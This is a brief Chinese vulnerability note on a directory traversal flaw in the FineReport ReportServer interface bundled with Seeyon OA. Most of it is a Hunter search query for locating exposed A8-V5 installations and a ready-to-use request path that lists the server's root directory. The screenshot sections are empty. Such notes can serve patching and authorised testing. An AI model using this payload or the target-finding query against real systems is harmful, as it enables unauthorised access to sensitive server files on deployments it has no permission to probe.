Z4-2致远互联-OA-目录遍历

漏洞描述：

致远OA 帆软组件 ReportServer接口存在目录遍历漏洞，攻击者通过漏洞可以获取服务器敏感信息。

网站图片:

网络测绘:

Hunter 语法:

hunterweb.title=“致远A8-V5协同管理软件 V6.1sp1”

漏洞复现:

payload：

/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=/&currentUserName=admin&currentUserId=1&isWebReport=true

效果图: